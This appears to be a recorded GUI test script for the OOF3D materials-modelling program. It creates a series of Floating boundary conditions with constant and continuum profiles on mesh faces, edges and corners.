checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, Zmin face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Zmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, Zmin face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Edge boundaries follow: Floating BC, Constant Profile, XmaxYmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, XmaxYmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, XmaxYmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, XmaxYmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, XmaxZmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, XmaxZmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, XmaxZmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, XmaxZmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, XminYmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, XminYmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, XminYmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, XminYmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, XminZmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, XminZmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, XminZmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, XminZmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, YmaxZmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'YmaxZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, YmaxZmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, YmaxZmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'YmaxZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, YmaxZmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYmaxZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, YminZmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'YminZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, YminZmax edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYminZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, YminZmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'YminZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYminZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, YminZmin edge.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Corner boundaries follow: Floating BC, Constant Profile, XmaxYmaxZmax corner.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYmaxZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYmaxZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, XmaxYmaxZmax corner.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYmaxZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, XmaxYmaxZmin corner.
# (The OOF.Mesh.Boundary_Conditions.New checkpoint for this operation lies
# beyond the end of this chunk.)
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYmaxZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYmaxZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYminZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYminZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYminZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYminZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
